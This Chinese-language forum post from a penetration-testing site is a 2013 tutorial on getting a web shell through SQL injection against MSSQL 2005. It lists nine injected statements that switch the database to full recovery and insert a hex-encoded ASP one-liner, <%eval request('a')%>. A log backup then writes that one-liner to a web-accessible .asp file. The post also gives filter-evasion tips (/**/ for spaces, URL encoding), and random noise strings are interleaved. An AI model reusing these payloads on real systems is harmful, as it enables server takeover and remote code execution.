中国网络渗透测试联盟
标题:
mssql2005 DB权限导出一句话
[打印本页]
作者:
admin
时间:
2013-7-16 20:32
标题:
mssql2005 DB权限导出一句话
网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。
/ M' c7 i! \) k: R$ V, M
* T# X2 [/ ?0 T) M# r. v
$ o8 T( X$ z1 f9 R1 `& F
后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体的利用语句,但贴出来的文章貌似没啥水准,大家都知道手工差异备份是自己需要修改数据库名和网站路径的,但那个文章中对语句没有做任何解释,无奈之下我只好自己尝试了,虽然测试的网站没有成功拿下shell,单语句是没有错误的,我在本地的MSSQL2005的查询分析器中测试通过了,再次特将语句整理出来分享个大家,并做好详细的解释说明,首先来贴出语句。
( c2 A! e" K3 n+ N5 o$ ^; K( ~ l
6 F9 D. N. `, S) ], u% Z
第一步
1 k+ O: q: D4 G6 @1 A
;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--
+ c: K6 n$ B8 S4 H; m+ L
" w3 z: Q/ x5 d8 n3 t( p1 ~2 X
第二步:
8 ]2 q' n* ^ d8 T* G
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
2 X( P/ K3 A' a: I4 ^
X1 y7 s# d7 Q
第三步
/ S( k# I" x- N+ i( Y8 @
;drop/**/table/**/[itpro]--
. ~7 ?! z! ^& z/ Z
2 }" d! L: b+ G
第四步
' F' p. G* D. V( r$ ?
;create/**/table/**/[itpro]([a]/**/image)--
9 a; _& G( S- `! I9 O
$ L+ Y! g+ Q/ |9 X9 r
第五步
1 l' J* u8 u' a* W2 a
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
& w, E/ H: H: }3 E* e
# a. M; w5 z+ y6 X8 e6 t) _
第六步
: G$ f- t# S% B. u2 f6 w
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
0 y% ~. k8 J+ ]; t6 S/ y- D
- d3 J& a( j; G
第七步
* l, m. y9 P, K) W4 ~) l. `
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
7 Y! \& @9 c0 t0 V
/ R) B4 w# |- a* w
第八步
/ n1 E; W: `: S# z5 ]4 l
;drop/**/table/**/[itpro]--
( Q; B; j7 ^1 |0 ^
" I# L5 y/ t6 I: e2 ~: \4 J
第九步
9 ?6 T1 T T/ ]$ f6 Z; K
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
4 k+ v: ?* `/ h- U* x/ x5 @+ {# e
. S0 ]% \1 i$ e) L
其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。
! W5 X' `' J8 x) G/ x J
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2